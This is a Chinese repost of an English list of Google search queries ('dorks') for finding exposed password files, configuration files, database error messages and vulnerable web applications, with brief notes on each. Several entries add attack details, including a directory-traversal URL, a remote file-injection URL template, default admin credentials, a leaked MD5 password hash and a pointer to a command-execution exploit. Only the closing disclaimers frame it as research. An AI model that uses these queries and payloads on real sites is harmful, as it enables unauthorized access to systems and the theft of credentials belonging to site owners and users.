编译:cnbird来源:http://www.juntuan.net/
以后给出的形式是这样的,数字的后面跟的是要再google搜索的内容,后面跟着介绍和漏洞如何利用,由于本人时间有限制,所以就不翻译了,如果大家有兴趣的话自己翻译翻译吧..
1.intitle:Login intext:"RT is ? Copyright"
RT is an enterprise-grade ticketing system which enables a group of people to intelligently and efficiently manage tasks, issues, and requests submitted by a community of users.
Versions including 2.0.13 are vulnerable to injection, check out
SecurityFocus BID 7509
点击这里去google搜索 ==>intitle:Login intext:"RT is ? Copyright"
2.intext:""BiTBOARD v2.0" BiTSHiFTERS Bulletin Board"
The bitboard2 is a board that need no database to work. So it is useful for webmaster that have no access to a sql database.
The password file can be retrieve from
/admin/data_passwd.dat
点击这里去google搜索 ==>intext:""BiTBOARD v2.0" BiTSHiFTERS Bulletin Board"
网管论坛bbs_bitsCN_com
3.ext:php program_listing intitle:MythWeb.Program.Listing
MythTV is a homebrew PVR project that I've been working on in my spare time. It's been under heavy development for two years, and is now quite useable and featureful
google==>ext:php program_listing intitle:MythWeb.Program.Listing
4.intitle:index.of abyss.conf
These directories reveal the configuration file of the abyss webserver. These files can contain passwords.
Google ==>intitle:index.of abyss.conf
给出一段,<!--StartFragment-->MIMEType video/quicktime qt mov
MIMEType video/x-msvideo avi
Version 1.2.1.0
login jagmal
password 5797ae9674912849532661d479f24751
大家一看猜测一下,不错这是md5的算法.
5.inurl:preferences.ini "[emule]"(5星级)
This finds the emule configuration file which contains some general and proxy information.
Sometimes proxy user and password are stored.
Google==>inurl:preferences.ini "[emule]"
网管网www_bitscn_com
6.ext:ini eudora.ini(4星级)
Well, this is the configuration file for Eudora...may contain sensitive information like pop servers, logins and encypted passwords sometimes.
Click here for the Google search ==>ext:ini eudora.ini
7.intitle:"Index of /CFIDE/" administrator
With ColdFusion, you can build and deploy powerful web applications and web services with far less training time and fewer lines of code than ASP, PHP, and JSP.
The search that pulls up directory listings we probably shouldn't be seeing.. entering the 'administrator' directory brings up a ColdFusion login screen
Click here for the Google search ==>intitle:"Index of /CFIDE/" administrator
8."# -FrontPage-" inurl:service.pwd(巨星级别)Frontpage.. very nice clean search results listing !!
No further comments required..
Click here for the Google search ==>"# -FrontPage-" inurl:service.pwd
9.passlist.txt (a better way)(5星级别)
网管u家u.bitsCN.com
Cleartext passwords. No decryption required!
Click here for the Google search ==>inurl:passlist.txt
10.index.of.password(5星级)
These directories are named "password." I wonder what you might find in here. Warning: sometimes p0rn sites make directories on servers with directories named "password" and single html files inside named things liks "horny.htm" or "brittany.htm." These are to boost their search results. Don't click them (unless you want to be buried in an avalanche of p0rn...
Click here for the Google search ==>index.of.password
11."access denied for user" "using password"(5星级)
Another SQL error message, this message can display the username, database, path names and partial SQL code, all of which are very helpful for hackers...
Click here for the Google search ==>"access denied for user" "useing password"
12.auth_user_file.txt(4星级)
网管下载dl.bitscn.com
DCForum's password file. This file gives a list of (crackable) passwords, usernames and email addresses for DCForum and for DCShop (a shopping cart program(!!!). Some lists are bigger than others, all are fun, and all belong to googledorks. =)
Click here for the Google search ==>allinurl:auth_user_file.txt
13.http://*:*@www" domainname(巨星级)
This is a query to get inline passwords from search engines (not just Google), you must type in the query followed with the the domain name without the .com or .net
"http://*:*@www" bangbus or "http://*:*@www"bangbus
Another way is by just typing
"http://bob:bob@www"
Click here for the Google search ==>"http://*:*@www" bob:bob
(危害特别大希望不要干坏事,不然就违背我的初衷了,希望大家合作,不然这个栏目就没有开的必要了)
ORA-00921: unexpected end of SQL command (5星级)
Another SQL error message from Cesar. This one coughs up full web pathnames and/or php filenames.
网管网www_bitscn_com
Click here for the Google search ==>"ORA-00921: unexpected end of SQL command"
14:ext:php intext:"Powered by phpNewMan Version"
PHP News Manager is a multi-platform compatible solution for managing websites and multi-user access. Features weekly poll management, gallery management, partners list management, public news support, and a lot more.
PHP News Manager is vulnerable to a directory traversal problem.
path/to/news/browse.php?clang=../../../../../../file/i/want
Click here for the Google search ==>ext:php intext:"Powered by phpNewMan Version"
15:inurl:"/becommunity/community/index.php?pageurl="(E-market remote code execution)
E-market is commercial software made by a korean company(http://www.bbs2000.co.kr). A vulnerability in this software was reported to Bugtraq. The exploit is possible with the index.php script:
http://[TARGET]/becommunity/community/index.php?pageurl=[injection URL]
网管论坛bbs_bitsCN_com _market=Y&pageurl=[injection">http://[TARGET]/becommunity/community/index.php?from_market=Y&pageurl=[injection URL]
For more information read this:
http://echo.or.id/adv/adv06-y3dips-2004.txt
Author: y3dips
Date: Sept, 7th 2004
Location: Indonesian, Jakarta
Click here for the Google search ==>inurl:"/becommunity/community/index.php?pageurl="
16。intitle:"ASP FileMan" Resend -site:iisworks.com(5星级)
FileMan is a corporate web based storage and file management solution for intra- and internet. It runs on Microsoft IIS webservers and is written in ASP. All user and group settings are stored in a MS Access or SQL database.
Default user: user=admin, pass=pass
In the default installation a diagnostigs page calleddiags.asp exists the manual recommends to delete it, but it can be found in some installs. The path to the database is also on the page. If the server is not configured correctly, the mdb file can be downloaded and the passwords are not encrypted.
网管下载dl.bitscn.com
Site admins have been notified. As always: DO NOT ABUSE THIS.
Click here for the Google search ==>intitle:"ASP FileMan" Resend -site:iisworks.com
17."BosDates Calendar System " "powered by BosDates v3.2 by BosDev"
"BosDates is a flexible calendar system which allows for multiple calendars, email notifications, repeating events and much more. All of which are easily maintained by even the least technical users."
There is a vulnerability in BosDates that allows an attacker to disclose sensitive information via SQL injection.
漏洞描述地址:http://www.zone-h.org/en/advisories/read/id=3925/
Click here for the Google search ==>"BosDates Calendar System " "powered by BosDates v3.2 by BosDev"
18."Enter ip" inurl:"php-ping.php"
It has been reported that php-ping may be prone to a remote command execution vulnerability that may allow remote attackers to execute commands on vulnerable systems. The problem exists due to insufficient sanitization of shell
网管网www.bitscn.com metacharacters via the 'count' parameter of php-ping.php script.
漏洞利用办法:http://www.securityfocus.com/bid/9309/exploit/
例子:http://img64.exs.cx/my.php?loc=img64&image=phpping.jpg
19:ext:conf inurl:rsyncd.conf -cvs -man
rsync is an open source utility that provides fast incremental file transfer.
rsync can also talk to "rsync servers" which can provide anonymous or authenticated rsync.
The configuration files contain data about peers and paths
Click here for the Google search ==>ext:conf inurl:rsyncd.conf -cvs -man
本文只限于研究学习,请不要利用本文做破坏。
评论加载中…
